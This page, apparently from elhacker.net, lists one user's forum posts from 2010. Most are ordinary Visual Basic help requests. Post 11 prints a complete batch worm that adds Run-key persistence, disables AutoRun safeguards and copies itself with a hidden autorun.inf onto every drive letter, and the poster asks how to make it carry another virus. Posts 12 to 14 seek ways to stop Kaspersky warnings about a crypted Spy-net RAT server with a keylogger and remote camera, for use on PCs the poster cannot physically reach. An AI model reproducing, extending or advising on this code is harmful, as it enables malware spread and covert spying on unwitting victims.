elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Programación / Scripting / Duda con propagacion por usb en: 5 Septiembre 2010, 19:20 pm
Bueno buscando por internet encontre este batch de DracoX pero me surgen varias dudas.
Código
  1. @echo off
  2. reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USB-Auto /d %windir%\USB-Auto\USB.bat /f
  3. reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom /v AutoRun /t REG_DWORD /d 1 /f
  4. reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v allocatecdroms /d 0 /f
  5. reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /f
  6. reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /f
  7. reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveAutoRun /f
  8.  
  9. if exist %windir%\USB-Auto\ Del /f /s /q %windir%\USB-Auto\
  10. md %windir%\USB-Auto\
  11. pushd %windir%\USB-Auto\
  12. copy %0 USB.bat
  13.  
  14. echo [autorun]>>autorun.inf
  15. echo open=USB.bat>>autorun.inf
  16. echo icon=icon.ico>>autorun.inf
  17. echo label=Infected>>autorun.inf
  18.  
  19. for %%x in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do copy /Y autorun.inf %%x:\autorun.inf && copy %0 %%x:\USB.bat && copy /Y %0 %%x:\icon.ico && attrib +R +S +H %%x:\icon.ico && attrib +R +S +H %%x:\USB.bat && attrib +R +S +H %%x:\autorun.inf

Esto lo unico que haria seria copiarse a si mismo guardarse en el pc y copiarse automaticamente en cualquier usb que se conecte no?

Por que realiza algunas acciones con el registro?

Como lo tendria que modificar para que tambien propagara un virus ejemplo mibixo.exe?

Por ultimo hace falta crearle un autorun para que se ejecute cuando se abra la unidad?

Gracias
12  Seguridad Informática / Análisis y Diseño de Malware / Re: Como vurlar advertencias de AV en: 4 Septiembre 2010, 18:53 pm
Si utilice un crypter y es tanto runtime como scantime, en realidad el AV no lo detecta como virus si no que me informa de que esta teniendo acceso a datos del sistema y eso lo pone a menudo cuando intento instalar un programa que no tiene firma digital.
13  Seguridad Informática / Análisis y Diseño de Malware / Re: Como vurlar advertencias de AV en: 4 Septiembre 2010, 18:40 pm
Pero eso será efectivo hasta que se ejecute el virus.

Saludos

Pero una vez que sea ejecutado volvera a salir esas notificaciones y apareceria de nuevo el problema.
14  Seguridad Informática / Análisis y Diseño de Malware / Como burlar advertencias de AV en: 4 Septiembre 2010, 17:37 pm
Hola, utilizo Kaspersky IS, logro hacer el server del Spy-net indetectable pero cuando lo ejecuto el AV me informa de que server.exe quiere tener acceso a datos del sistema (eso sale cada vez que abro alguna funcion del spy-net (keylooger, remote cam...) Y he puesto el server en la lista de excepciones del AV y ya no salen esos mensajes, pero claro ¿que puedo hacer para que no salga ese mensaje en una PC a la q no tenga acceso fisicamente?
15  Programación / Programación Visual Basic / Re: No se como hacerlo en: 22 Agosto 2010, 19:38 pm
por que me recomiendas ese?
16  Programación / Programación Visual Basic / Re: No se como hacerlo en: 22 Agosto 2010, 19:29 pm
No se si es mucho pedir pero podrias traducirlo o alguien que lo haga porfavor.
17  Programación / Programación Visual Basic / Re: No se como hacerlo en: 22 Agosto 2010, 19:09 pm
Hola, no quiero ser pesado  :( pero me sigue dando los mismo errores, he pensado que alomejor usamos distintas versiones de visual basic. Yo utilizo Visual Basic 2008 Express Edition.
18  Programación / Programación Visual Basic / Re: No se como hacerlo en: 22 Agosto 2010, 14:25 pm
Hey, cada dia creo que soy mas torpe en el textbox puse esto (en el codigo).
Código
  1. Private Sub Form_Load()
  2.        Dim direccion As String
  3.        direccion = "C:\Users\Adrián\Desktop\datos.txt"
  4.        TextBox4 = ""
  5.  
  6.  Open direccion For Input As #1
  7.  
  8.  
  9.        While Not EOF(1)
  10.  
  11.    Line Input #1, Linea
  12.  
  13.            TextBox4 = Linea
  14.  
  15.        End While
  16.  
  17.        Close()
  18.  
  19.  
  20.  
  21.  
  22.    End Sub

Yo cambie text1 por textbox4  porque supuse que como es otra version cambia el nombre de los objetos y ademas me cambia automaticamente Wend por End While. Pero ahora me da varios errores.

Errores: http://img842.imageshack.us/i/228201014881.jpg/
19  Programación / Programación Visual Basic / Re: No se como hacerlo en: 22 Agosto 2010, 01:58 am
Muchas gracias petro_boca tiene buena pinta, hoy no me da tiempo de probarlo mañana lo hago y te cuento, porfavor no me cierren el post hasta mañana por la noche por si me surge alguna duda.
GRACIAS
20  Programación / Programación Visual Basic / Re: No se como hacerlo en: 22 Agosto 2010, 01:30 am


Creo que lo que me dices no es lo que busco, pero gracias. Dime si me equivoco(eso es para que se habra lo que ponga en el textbox no?) Enparte eso es lo que quiero pero que una vez que cierre el programa se quede guardada esa direccion y que si algun dia la quiero cambiar que se pueda.


ahh..

yo cargaria un txt a la memoria, y q el txt tenga escrita la ruta, y q despues carges el contenido del txt (la ruta) al text1.text

Bien, pero se podria cambiar y guardar una nueva direccion con ese metodo todas las veces que quieras.
Y como se haria? :huh: :-[
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines